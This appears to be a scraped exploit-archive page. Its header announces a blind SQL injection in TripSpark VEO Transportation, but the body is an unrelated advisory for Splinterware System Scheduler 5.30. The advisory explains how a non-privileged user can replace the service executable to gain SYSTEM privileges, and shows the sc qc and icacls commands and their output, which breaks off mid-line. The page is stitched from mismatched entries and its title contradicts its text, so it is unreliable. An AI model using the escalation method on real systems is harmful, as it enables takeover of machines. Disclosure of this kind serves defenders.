TripSpark VEO Transportation SQL Injection

TripSpark VEO Transportation suffers from a remote blind SQL injection vulnerability.

MD5 | 189e05e837b3360b20c7fe7a7553e8e5

Download

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path
# Date: 2021-05-11
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64

System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
will be executed after a short while.

C:\Users\test>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: WindowsScheduler
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 0   IGNORE
        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : System Scheduler Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
                      NT SERVICE\TrustedInstaller:(I)(F)
                      NT SERVICE\TrustedInstaller:(I

Source: packetstormsecurity.com